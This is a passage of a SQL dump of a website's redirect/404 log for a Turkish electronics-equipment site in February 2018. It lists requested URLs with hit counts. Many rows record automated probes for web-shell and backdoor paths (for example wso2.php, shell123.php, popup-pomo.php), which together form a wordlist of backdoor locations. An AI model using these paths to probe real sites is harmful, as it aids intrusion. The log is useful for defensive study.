01:06:24','0000-00-00 00:00:00',301),(18460,'http://3s-technologies.com.tr/en//cms/wp-includes/wlwmanifest.xml',NULL,'','',119,0,'2018-02-10 01:06:24','0000-00-00 00:00:00',301),(18461,'http://3s-technologies.com.tr/tr/libraries/idna_convert/mod.php',NULL,'http://site.ru','',1,0,'2018-02-10 01:39:36','0000-00-00 00:00:00',301),(18462,'http://3s-technologies.com.tr/tr/cron.php',NULL,'http://site.ru','',45,0,'2018-02-10 02:20:18','0000-00-00 00:00:00',301),(18463,'http://3s-technologies.com.tr/tr/images/al.php',NULL,'http://site.ru','',2,0,'2018-02-10 02:20:39','0000-00-00 00:00:00',301),(18464,'http://3s-technologies.com.tr/tr/includes/inc.php',NULL,'http://site.ru','',3,0,'2018-02-10 03:00:43','0000-00-00 00:00:00',301),(18465,'http://3s-technologies.com.tr/tr/modules/mod_objects/library/object.php',NULL,'http://site.ru','',5,0,'2018-02-10 03:44:38','0000-00-00 00:00:00',301),(18466,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,product_name/results,1-100',NULL,'','',2,0,'2018-02-10 04:47:43','0000-00-00 00:00:00',301),(18467,'http://3s-technologies.com.tr/tr/modules/mod_stats/tmpl/wso2.php',NULL,'http://site.ru','',1,0,'2018-02-10 05:05:32','0000-00-00 00:00:00',301),(18468,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.4/cache.php',NULL,'http://site.ru','',3,0,'2018-02-10 05:19:41','0000-00-00 00:00:00',301),(18469,'http://3s-technologies.com.tr/tr/templates/system/template.php',NULL,'http://site.ru','',1,0,'2018-02-10 06:12:52','0000-00-00 00:00:00',301),(18470,'http://3s-technologies.com.tr/tr/532299.php',NULL,'http://site.ru','',3,0,'2018-02-10 06:42:07','0000-00-00 00:00:00',301),(18471,'https://www.3s-technologies.com.tr/en/products/smd-orta-hızlı/am100-detail',NULL,'','',1,0,'2018-02-10 07:21:51','0000-00-00 00:00:00',301),(18472,'http://3s-technologies.com.tr/tr/modules/mod_helper/mod_helper.php',NULL,'http://site.ru','',1,0,'2018-02-10 08:03:49','0000-00-00 00:00:00',301),(18473,'http://3s-technologies.com.tr/tr/content-post.php',NULL,'http://site.ru','',16,0,'2018-02-10 08:55:22','0000-00-00 00:00:00',301),(18474,'http://3s-technologies.com.tr/tr/administrator/language/en-gb/en.php',NULL,'http://site.ru','',1,0,'2018-02-10 09:36:46','0000-00-00 00:00:00',301),(18475,'http://3s-technologies.com.tr/tr/log.php',NULL,'http://site.ru','',222,0,'2018-02-10 12:54:22','0000-00-00 00:00:00',301),(18476,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,category_name/results,1-20',NULL,'','',1,0,'2018-02-10 14:45:27','0000-00-00 00:00:00',301),(18477,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,category_name/results,1-40',NULL,'','',1,0,'2018-02-10 14:50:34','0000-00-00 00:00:00',301),(18478,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/temizleme-makineleri',NULL,'','',8,0,'2018-02-10 17:09:35','0000-00-00 00:00:00',301),(18479,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2018-02-10 18:18:33','0000-00-00 00:00:00',301),(18480,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,category_name/results,1-100',NULL,'','',1,0,'2018-02-11 19:52:26','0000-00-00 00:00:00',301),(18481,'http://3s-technologies.com.tr/tr/images/mirae/1226656899.jpg',NULL,'http://3s-technologies.com.tr/tr/%C3%BCr%C3%BCnler/smd-ultra-h%C4%B1z/mx200lp-3-detail','',3,0,'2018-02-12 12:04:25','0000-00-00 00:00:00',301),(18482,'http://www.3s-technologies.com.tr/tr/components/com_b2jcontact/index.html',NULL,'','',1,0,'2018-02-12 15:19:54','0000-00-00 00:00:00',301),(18483,'https://3s-technologies.com.tr/templates/index.php',NULL,'3s-technologies.com.tr','',1,0,'2018-02-12 16:00:41','0000-00-00 00:00:00',301),(18484,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,`p`.product_sku/results,1-20',NULL,'','',1,0,'2018-02-13 00:17:48','0000-00-00 00:00:00',301),(18485,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,pc.ordering,product_name/dirdesc',NULL,'','',3,0,'2018-02-13 02:08:31','0000-00-00 00:00:00',301),(18486,'http://3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=60&itemid=164&lang=tr',NULL,'','',1,0,'2018-02-13 02:08:50','0000-00-00 00:00:00',301),(18487,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,`p`.product_sku/results,1-10',NULL,'','',1,0,'2018-02-13 06:17:47','0000-00-00 00:00:00',301),(18488,'http://3s-technologies.com.tr/tr/admin',NULL,'','',151,0,'2018-02-13 09:56:46','0000-00-00 00:00:00',301),(18489,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/k_sb_2_250x250.png',NULL,'','',1,0,'2018-02-13 10:09:27','0000-00-00 00:00:00',301),(18490,'http://3s-technologies.com.tr/templates/index.php',NULL,'3s-technologies.com.tr','',1,0,'2018-02-13 11:24:02','0000-00-00 00:00:00',301),(18491,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/user-files/readme.txt',NULL,'','',1,0,'2018-02-13 12:14:15','0000-00-00 00:00:00',301),(18492,'http://3s-technologies.com.tr/tr//libraries/w0rms.php',NULL,'','',1,0,'2018-02-13 18:07:27','0000-00-00 00:00:00',301),(18493,'http://3s-technologies.com.tr/tr//h.html',NULL,'','',1,0,'2018-02-13 18:07:27','0000-00-00 00:00:00',301),(18494,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,`p`.product_sku/results,1-100',NULL,'','',1,0,'2018-02-15 15:47:25','0000-00-00 00:00:00',301),(18495,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,pc.ordering,product_name/results,1-20',NULL,'','',1,0,'2018-02-15 17:03:11','0000-00-00 00:00:00',301),(18496,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,pc.ordering,product_name/results,1-40',NULL,'','',3,0,'2018-02-15 18:37:55','0000-00-00 00:00:00',301),(18497,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,pc.ordering,product_name/results,1-10',NULL,'','',1,0,'2018-02-15 19:34:46','0000-00-00 00:00:00',301),(18498,'http://www.3s-technologies.com.tr/joomla/index.php?limitstart=5&lang=tr',NULL,'','',8,0,'2018-02-16 00:29:54','0000-00-00 00:00:00',301),(18499,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,`p`.product_sku/results,1-40',NULL,'','',1,0,'2018-02-16 03:54:53','0000-00-00 00:00:00',301),(18500,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,pc.ordering,product_name/results,1-100',NULL,'','',4,0,'2018-02-16 08:58:00','0000-00-00 00:00:00',301),(18501,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,mf_name/dirdesc/results,1-10',NULL,'','',1,0,'2018-02-16 09:28:10','0000-00-00 00:00:00',301),(18502,'https://www.3s-technologies.com.tr/en/dmb-elektronik.com/j3.2/index.php/component/users?view=registration',NULL,'https://www.3s-technologies.com.tr/dmb-elektronik.com/j3.2/index.php/component/users/?view=registration','',28,0,'2018-02-16 09:31:21','0000-00-00 00:00:00',301),(18503,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,mf_name/dirdesc/results,1-100',NULL,'','',3,0,'2018-02-16 11:21:51','0000-00-00 00:00:00',301),(18504,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,product_name/dirdesc/results,1-10',NULL,'','',4,0,'2018-02-16 13:15:32','0000-00-00 00:00:00',301),(18505,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,product_name/dirdesc/results,1-40',NULL,'','',2,0,'2018-02-16 13:53:25','0000-00-00 00:00:00',301),(18506,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,product_name/dirdesc/results,1-20',NULL,'','',1,0,'2018-02-16 15:38:13','0000-00-00 00:00:00',301),(18507,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,product_name/dirdesc/results,1-100',NULL,'','',3,0,'2018-02-16 15:48:30','0000-00-00 00:00:00',301),(18508,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,category_name/dirdesc/results,1-10',NULL,'','',3,0,'2018-02-16 18:36:41','0000-00-00 00:00:00',301),(18509,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,ordering/results,1-20',NULL,'','',1,0,'2018-02-17 08:17:15','0000-00-00 00:00:00',301),(18510,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,product_sku/results,1-20?language=en-gb',NULL,'','',1,0,'2018-02-17 12:22:13','0000-00-00 00:00:00',301),(18511,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,category_name/dirdesc/results,1-20',NULL,'','',1,0,'2018-02-17 23:02:08','0000-00-00 00:00:00',301),(18512,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/screen-printer/by,product_sku/results,1-20',NULL,'','',1,0,'2018-02-18 04:06:02','0000-00-00 00:00:00',301),(18513,'http://3s-technologies.com.tr/tr/logs/old_log.php',NULL,'http://site.ru','',2,0,'2018-02-18 08:21:07','0000-00-00 00:00:00',301),(18514,'http://3s-technologies.com.tr/tr/components/com_b2jcontact/wp13.php',NULL,'http://site.ru','',1,0,'2018-02-18 08:21:27','0000-00-00 00:00:00',301),(18515,'http://3s-technologies.com.tr/tr/modules/mod_k2_comment.php',NULL,'http://site.ru','',1,0,'2018-02-18 08:23:06','0000-00-00 00:00:00',301),(18516,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/by,mf_name/results,1-10',NULL,'','',1,0,'2018-02-18 09:09:10','0000-00-00 00:00:00',301),(18517,'http://3s-technologies.com.tr/tr/function-sync.php.suspected',NULL,'http://site.ru','',1,0,'2018-02-18 09:30:15','0000-00-00 00:00:00',301),(18518,'http://3s-technologies.com.tr/tr/plugins/editors/tinymce/templates/xml.php',NULL,'http://site.ru','',1,0,'2018-02-18 10:00:49','0000-00-00 00:00:00',301),(18519,'http://3s-technologies.com.tr/tr/modules/mod_articles_archive/tmpl/advanced_settings.php',NULL,'http://site.ru','',4,0,'2018-02-18 10:01:03','0000-00-00 00:00:00',301),(18520,'http://3s-technologies.com.tr/tr/modules/mod_mapsapi/mod_mapsapi.php',NULL,'http://site.ru','',2,0,'2018-02-18 10:46:16','0000-00-00 00:00:00',301),(18521,'http://3s-technologies.com.tr/tr/modules/mod_mapsgoogle/mod_mapsgoogle.php',NULL,'http://site.ru','',1,0,'2018-02-18 11:16:57','0000-00-00 00:00:00',301),(18522,'http://3s-technologies.com.tr/tr/modules/mod_footer/tmpl/site.php',NULL,'http://site.ru','',2,0,'2018-02-18 12:14:11','0000-00-00 00:00:00',301),(18523,'http://3s-technologies.com.tr/tr/tmp/xml.php',NULL,'http://site.ru','',3,0,'2018-02-18 12:14:33','0000-00-00 00:00:00',301),(18524,'http://3s-technologies.com.tr/tr/cache/cleanup.php',NULL,'http://site.ru','',2,0,'2018-02-18 12:14:34','0000-00-00 00:00:00',301),(18525,'http://3s-technologies.com.tr/tr/administrator/includes/system.php',NULL,'http://site.ru','',2,0,'2018-02-18 12:14:34','0000-00-00 00:00:00',301),(18526,'http://3s-technologies.com.tr/tr/old/wp-content/plugins/easyrotator-for-wordpress/marvins.php',NULL,'http://site.ru','',2,0,'2018-02-18 12:15:09','0000-00-00 00:00:00',301),(18527,'http://3s-technologies.com.tr/tr/media/editors/tinymce/jscripts/tiny_mce/plugins/fullpage/langs/langs.php',NULL,'http://site.ru','',1,0,'2018-02-18 13:27:13','0000-00-00 00:00:00',301),(18528,'http://3s-technologies.com.tr/tr/media/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/o2k7/o2k7.php',NULL,'http://site.ru','',1,0,'2018-02-18 13:45:28','0000-00-00 00:00:00',301),(18529,'http://3s-technologies.com.tr/tr/tmp/images2.php',NULL,'http://site.ru','',1,0,'2018-02-18 14:17:07','0000-00-00 00:00:00',301),(18530,'http://3s-technologies.com.tr/tr/media/media/default.php',NULL,'http://site.ru','',2,0,'2018-02-18 14:47:01','0000-00-00 00:00:00',301),(18531,'http://3s-technologies.com.tr/tr/includes/configurati0n.php',NULL,'http://site.ru','',1,0,'2018-02-18 15:52:05','0000-00-00 00:00:00',301),(18532,'http://3s-technologies.com.tr/tr/libraries/phpmailer/pop.php',NULL,'http://site.ru','',1,0,'2018-02-18 17:01:11','0000-00-00 00:00:00',301),(18533,'http://3s-technologies.com.tr/tr/wp-auto.php',NULL,'http://site.ru','',2,0,'2018-02-18 17:52:28','0000-00-00 00:00:00',301),(18534,'http://3s-technologies.com.tr/tr/cache/sok/s.php',NULL,'http://site.ru','',2,0,'2018-02-18 17:54:04','0000-00-00 00:00:00',301),(18535,'http://3s-technologies.com.tr/tr/media/system.php',NULL,'http://site.ru','',1,0,'2018-02-18 18:12:18','0000-00-00 00:00:00',301),(18536,'http://3s-technologies.com.tr/tr/administrator/components/com_banners/banners.html.php',NULL,'http://site.ru','',3,0,'2018-02-18 18:35:06','0000-00-00 00:00:00',301),(18537,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,category_name/dirdesc/results,1-40',NULL,'','',1,0,'2018-02-19 03:31:57','0000-00-00 00:00:00',301),(18538,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,category_name/dirdesc/results,1-100',NULL,'','',1,0,'2018-02-19 05:00:55','0000-00-00 00:00:00',301),(18539,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,`p`.product_sku/dirdesc/results,1-20',NULL,'','',1,0,'2018-02-19 06:03:31','0000-00-00 00:00:00',301),(18540,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,`p`.product_sku/dirdesc/results,1-10',NULL,'','',1,0,'2018-02-19 09:11:20','0000-00-00 00:00:00',301),(18541,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,`p`.product_sku/dirdesc/results,1-40',NULL,'','',1,0,'2018-02-19 10:29:35','0000-00-00 00:00:00',301),(18542,'http://3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=87&itemid=103&lang=tr',NULL,'','',1,0,'2018-02-19 11:29:56','0000-00-00 00:00:00',301),(18543,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,`p`.product_sku/dirdesc/results,1-100',NULL,'','',3,0,'2018-02-19 11:32:12','0000-00-00 00:00:00',301),(18544,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,pc.ordering,product_name/dirdesc/results,1-10',NULL,'','',1,0,'2018-02-19 13:42:19','0000-00-00 00:00:00',301),(18545,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler',NULL,'','',2,0,'2018-02-19 13:46:30','0000-00-00 00:00:00',301),(18546,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-dã¼åÿã¼k-hä±zlä±',NULL,'','',1,0,'2018-02-19 13:46:48','0000-00-00 00:00:00',301),(18547,'http://3s-technologies.com.tr/tr/urunler/user',NULL,'http://3s-technologies.com.tr/tr/urunler/user','',82,0,'2018-02-19 15:22:10','0000-00-00 00:00:00',301),(18548,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,pc.ordering,product_name/dirdesc/results,1-20',NULL,'','',1,0,'2018-02-19 16:19:48','0000-00-00 00:00:00',301),(18549,'http://3s-technologies.com.tr/tr/install/installwizard.aspx?__viewstate=',NULL,'','',1,0,'2018-02-19 22:58:51','0000-00-00 00:00:00',301),(18550,'http://3s-technologies.com.tr/en/libraries/joomla/database/bclass.php?c=md5&f=2343534',NULL,'3s-technologies.com.tr','',1,0,'2018-02-20 10:24:51','0000-00-00 00:00:00',301),(18551,'http://3s-technologies.com.tr/tr/default.php',NULL,'http://site.ru','',293,0,'2018-02-20 10:39:42','0000-00-00 00:00:00',301),(18552,'http://3s-technologies.com.tr/tr/components/com_jce/editor/tiny_mce/plugins/fullscreen/htaccess.php',NULL,'http://site.ru','',3,0,'2018-02-20 10:40:13','0000-00-00 00:00:00',301),(18553,'http://3s-technologies.com.tr/tr/images/sampledata/fruitshop/smile.php',NULL,'http://site.ru','',1,0,'2018-02-20 11:08:42','0000-00-00 00:00:00',301),(18554,'http://3s-technologies.com.tr/tr/aa.php',NULL,'http://site.ru','',392,0,'2018-02-20 11:09:36','0000-00-00 00:00:00',301),(18555,'http://3s-technologies.com.tr/tr/images/headers/smile.php',NULL,'http://site.ru','',1,0,'2018-02-20 11:09:51','0000-00-00 00:00:00',301),(18556,'https://www.3s-technologies.com.tr/en/products/dalga-lehim/lfs-1-detail',NULL,'','',1,0,'2018-02-20 11:21:37','0000-00-00 00:00:00',301),(18557,'http://3s-technologies.com.tr/tr/feeder/popup-pomo.php',NULL,'http://site.ru','',3,0,'2018-02-20 12:34:24','0000-00-00 00:00:00',301),(18558,'http://3s-technologies.com.tr/tr/images/xjske.php',NULL,'http://site.ru','',1,0,'2018-02-20 12:34:35','0000-00-00 00:00:00',301),(18559,'http://www.3s-technologies.com.tr/en/products/smd-düşük-hızlı/by,mf_name/dirdesc/results,1-20',NULL,'','',1,0,'2018-02-20 12:39:01','0000-00-00 00:00:00',301),(18560,'http://3s-technologies.com.tr/tr/administrator/templates/hathor/html/layouts/com_media/htaccess.php',NULL,'http://site.ru','',1,0,'2018-02-20 14:00:20','0000-00-00 00:00:00',301),(18561,'http://3s-technologies.com.tr/tr/components/com_jce/editor/extensions/aggregator/vimeo/htaccess.php',NULL,'http://site.ru','',1,0,'2018-02-20 14:01:17','0000-00-00 00:00:00',301),(18562,'http://3s-technologies.com.tr/tr/images/stories/index.php',NULL,'http://site.ru','',1,0,'2018-02-20 14:05:41','0000-00-00 00:00:00',301),(18563,'http://3s-technologies.com.tr/tr/ciosans.php',NULL,'http://site.ru','',2,0,'2018-02-20 14:58:45','0000-00-00 00:00:00',301),(18564,'http://3s-technologies.com.tr/tr/hipay/popup-pomo.php',NULL,'http://site.ru','',1,0,'2018-02-20 15:24:29','0000-00-00 00:00:00',301),(18565,'http://3s-technologies.com.tr/tr/index1.php',NULL,'http://site.ru','',16,0,'2018-02-20 15:24:37','0000-00-00 00:00:00',301),(18566,'http://3s-technologies.com.tr/tr/homefeatured/popup-pomo.php',NULL,'http://site.ru','',3,0,'2018-02-20 15:52:48','0000-00-00 00:00:00',301),(18567,'http://3s-technologies.com.tr/tr/images/logs.php',NULL,'http://site.ru','',1,0,'2018-02-20 16:25:08','0000-00-00 00:00:00',301),(18568,'http://3s-technologies.com.tr/tr/components/com_banners/helpers/mdama.php',NULL,'http://site.ru','',2,0,'2018-02-20 16:49:28','0000-00-00 00:00:00',301),(18569,'http://3s-technologies.com.tr/tr/look.php.suspected',NULL,'http://site.ru','',3,0,'2018-02-20 16:49:29','0000-00-00 00:00:00',301),(18570,'http://3s-technologies.com.tr/tr/media/editors/tinymce/plugins/visualblocks/css/htaccess.php',NULL,'http://site.ru','',1,0,'2018-02-20 17:45:48','0000-00-00 00:00:00',301),(18571,'http://3s-technologies.com.tr/tr/jemobile.php',NULL,'http://site.ru','',3,0,'2018-02-20 18:40:42','0000-00-00 00:00:00',301),(18572,'http://3s-technologies.com.tr/tr/mail/logo_img.php',NULL,'http://site.ru','',2,0,'2018-02-20 18:42:35','0000-00-00 00:00:00',301),(18573,'http://3s-technologies.com.tr/tr/c0nfig.php',NULL,'http://site.ru','',5,0,'2018-02-20 19:08:42','0000-00-00 00:00:00',301),(18574,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-hızlı/by,mf_name/results,1-50?language=en-gb',NULL,'','',2,0,'2018-02-20 20:21:50','0000-00-00 00:00:00',301),(18575,'http://3s-technologies.com.tr/tr/media/editors/tinymce/plugins/emoticons/img/htaccess.php',NULL,'http://site.ru','',2,0,'2018-02-21 03:17:58','0000-00-00 00:00:00',301),(18576,'http://3s-technologies.com.tr/tr/components/com_search/models/popup-pomo.php',NULL,'http://site.ru','',3,0,'2018-02-21 03:18:02','0000-00-00 00:00:00',301),(18577,'http://3s-technologies.com.tr/tr/includes/logo_img.php.suspected',NULL,'http://site.ru','',2,0,'2018-02-21 03:18:02','0000-00-00 00:00:00',301),(18578,'http://3s-technologies.com.tr/tr/footer.php',NULL,'http://site.ru','',48,0,'2018-02-21 03:20:12','0000-00-00 00:00:00',301),(18579,'http://3s-technologies.com.tr/tr/images/config.php',NULL,'http://site.ru','',2,0,'2018-02-21 04:11:56','0000-00-00 00:00:00',301),(18580,'http://3s-technologies.com.tr/tr/fianetfraud/popup-pomo.php',NULL,'http://site.ru','',2,0,'2018-02-21 04:38:27','0000-00-00 00:00:00',301),(18581,'http://3s-technologies.com.tr/tr/modules/dkcqe.php',NULL,'http://site.ru','',1,0,'2018-02-21 04:38:57','0000-00-00 00:00:00',301),(18582,'http://3s-technologies.com.tr/tr/images/images/enisej-ob-enisej/matusale/wghqffm.php',NULL,'http://site.ru','',5,0,'2018-02-21 04:40:01','0000-00-00 00:00:00',301),(18583,'http://3s-technologies.com.tr/tr/administrator/components/com_akeeba/bvlaco.php',NULL,'http://site.ru','',2,0,'2018-02-21 05:32:11','0000-00-00 00:00:00',301),(18584,'http://3s-technologies.com.tr/tr/changelog.php',NULL,'http://site.ru','',4,0,'2018-02-21 05:32:48','0000-00-00 00:00:00',301),(18585,'http://3s-technologies.com.tr/tr/gg.php',NULL,'http://site.ru','',117,0,'2018-02-21 05:36:37','0000-00-00 00:00:00',301),(18586,'http://3s-technologies.com.tr/tr/components/com_finder/models/models.php',NULL,'http://site.ru','',2,0,'2018-02-21 06:25:33','0000-00-00 00:00:00',301),(18587,'http://3s-technologies.com.tr/tr/entful/popup-pomo.php',NULL,'http://site.ru','',3,0,'2018-02-21 07:45:52','0000-00-00 00:00:00',301),(18588,'http://3s-technologies.com.tr/tr/cli/headers_img.php.suspected',NULL,'http://site.ru','',1,0,'2018-02-21 07:45:53','0000-00-00 00:00:00',301),(18589,'http://3s-technologies.com.tr/tr/aws.php',NULL,'http://site.ru','',8,0,'2018-02-21 08:39:30','0000-00-00 00:00:00',301),(18590,'http://3s-technologies.com.tr/tr/gcheckout/popup-pomo.php',NULL,'http://site.ru','',1,0,'2018-02-21 09:31:49','0000-00-00 00:00:00',301),(18591,'http://3s-technologies.com.tr/tr/images/audio/albums/shell123.php',NULL,'http://site.ru','',2,0,'2018-02-21 09:32:00','0000-00-00 00:00:00',301),(18592,'http://3s-technologies.com.tr/tr/bubus.php',NULL,'http://site.ru','',2,0,'2018-02-21 10:00:27','0000-00-00 00:00:00',301),(18593,'http://3s-technologies.com.tr/tr/kadvl.php',NULL,'http://site.ru','',6,0,'2018-02-21 10:25:42','0000-00-00 00:00:00',301),(18594,'http://3s-technologies.com.tr/tr/content-post.php.suspected',NULL,'http://site.ru','',7,0,'2018-02-21 10:52:09','0000-00-00 00:00:00',301),(18595,'http://3s-technologies.com.tr/tr/content-post.php.suspected',NULL,'http://site.ru','',1,0,'2018-02-21 10:52:09','0000-00-00 00:00:00',301),(18596,'http://3s-technologies.com.tr/tr/images/banners/smile.php',NULL,'http://site.ru','',2,0,'2018-02-21 11:53:27','0000-00-00 00:00:00',301),(18597,'http://3s-technologies.com.tr/tr/includes/cache.inc.php',NULL,'http://site.ru','',1,0,'2018-02-21 14:27:14','0000-00-00 00:00:00',301),(18598,'http://3s-technologies.com.tr/tr/administrator/components/com_languages/views/multilangstatus/tmpl/htaccess.php',NULL,'http://site.ru','',3,0,'2018-02-21 15:53:44','0000-00-00 00:00:00',301),(18599,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,pc.ordering,product_name/dirdesc/results,1-40',NULL,'','',1,0,'2018-02-21 18:53:59','0000-00-00 00:00:00',301),(18600,'http://www.3s-technologies.com.tr/en/images/ddm/reflow ovens/spartan_8s.gif',NULL,'http://www.3s-technologies.com.tr/en/products-en/dalga-lehim/spartan-8s-8d-44-detail','',8,0,'2018-02-21 19:21:51','0000-00-00 00:00:00',301),(18601,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,pc.ordering,product_name/dirdesc/results,1-100',NULL,'','',3,0,'2018-02-21 19:38:58','0000-00-00 00:00:00',301),(18602,'http://3s-technologies.com.tr/tr/gfedew.php',NULL,'http://site.ru','',5,0,'2018-02-21 19:50:44','0000-00-00 00:00:00',301),(18603,'http://3s-technologies.com.tr/tr/actions/logo_img.php',NULL,'http://site.ru','',1,0,'2018-02-21 20:15:41','0000-00-00 00:00:00',301),(18604,'http://3s-technologies.com.tr/tr/fascina/popup-pomo.php',NULL,'http://site.ru','',2,0,'2018-02-21 20:17:43','0000-00-00 00:00:00',301),(18605,'http://3s-technologies.com.tr/tr/bin/logo_img.php',NULL,'http://site.ru','',3,0,'2018-02-21 21:08:02','0000-00-00 00:00:00',301),(18606,'http://3s-technologies.com.tr/tr/admin_login.php',NULL,'http://site.ru','',15,0,'2018-02-21 22:04:19','0000-00-00 00:00:00',301),(18607,'http://3s-technologies.com.tr/tr/images/sampledata/parks/smile.php',NULL,'http://site.ru','',1,0,'2018-02-21 22:29:54','0000-00-00 00:00:00',301),(18608,'http://3s-technologies.com.tr/tr/checkout/cart',NULL,'','',1,0,'2018-02-22 00:35:32','0000-00-00 00:00:00',301),(18609,'http://3s-technologies.com.tr/tr/mixi.php',NULL,'http://site.ru','',6,0,'2018-02-22 03:20:45','0000-00-00 00:00:00',301),(18610,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/screen-printer/by,category_name/dirdesc/results,1-10',NULL,'','',1,0,'2018-02-22 05:27:44','0000-00-00 00:00:00',301),(18611,'http://3s-technologies.com.tr/tr/administrator/edit/index.php',NULL,'http://site.ru','',2,0,'2018-02-22 06:19:10','0000-00-00 00:00:00',301),(18612,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,`p`.product_sku/results,1-20',NULL,'','',3,0,'2018-02-22 06:43:31','0000-00-00 00:00:00',301),(18613,'http://3s-technologies.com.tr/tr/templates/rhuk_milkyway/images/orange/jbqfc.php',NULL,'http://site.ru','',2,0,'2018-02-22 08:05:12','0000-00-00 00:00:00',301),(18614,'http://3s-technologies.com.tr/tr/templates/atomic/css/blueprint/plugins/link-icons/link-icons.php',NULL,'http://site.ru','',1,0,'2018-02-22 08:05:17','0000-00-00 00:00:00',301),(18615,'http://3s-technologies.com.tr/tr/upgrades.php',NULL,'http://site.ru','',5,0,'2018-02-22 08:07:06','0000-00-00 00:00:00',301),(18616,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,mf_name/dirdesc/results,1-100',NULL,'','',2,0,'2018-02-22 08:21:58','0000-00-00 00:00:00',301),(18617,'http://3s-technologies.com.tr/tr/updatecorea/popup-pomo.php',NULL,'http://site.ru','',2,0,'2018-02-22 08:39:02','0000-00-00 00:00:00',301),(18618,'http://3s-technologies.com.tr/tr/templates/mhqcfpt.php',NULL,'http://site.ru','',2,0,'2018-02-22 08:39:06','0000-00-00 00:00:00',301),(18619,'http://3s-technologies.com.tr/tr/templates/jblank/language/ru-ru/ru-ru.php',NULL,'http://site.ru','',1,0,'2018-02-22 08:42:32','0000-00-00 00:00:00',301),(18620,'http://3s-technologies.com.tr/tr/plugins/system/mijoshopjquery/mijoshopjquery/superfish/js/htaccess.php',NULL,'http://site.ru','',2,0,'2018-02-22 09:14:12','0000-00-00 00:00:00',301),(18621,'http://3s-technologies.com.tr/tr/wss.php',NULL,'http://site.ru','',3,0,'2018-02-22 09:45:56','0000-00-00 00:00:00',301),(18622,'http://3s-technologies.com.tr/tr/templates/jblank/img/images/prettyphoto/light_square/light_square.php',NULL,'http://site.ru','',2,0,'2018-02-22 09:46:01','0000-00-00 00:00:00',301),(18623,'http://3s-technologies.com.tr/tr/templates/beez3/css/marvins.php',NULL,'http://site.ru','',1,0,'2018-02-22 09:46:22','0000-00-00 00:00:00',301),(18624,'http://3s-technologies.com.tr/tr/wp-wpphp.php',NULL,'http://site.ru','',8,0,'2018-02-22 09:47:31','0000-00-00 00:00:00',301),(18625,'http://3s-technologies.com.tr/tr/templates/jblank/html/com_contact/com_contact.php',NULL,'http://site.ru','',1,0,'2018-02-22 10:19:26','0000-00-00 00:00:00',301),(18626,'http://3s-technologies.com.tr/tr/plugins/quickicon/quickicon.php',NULL,'http://site.ru','',2,0,'2018-02-22 10:19:57','0000-00-00 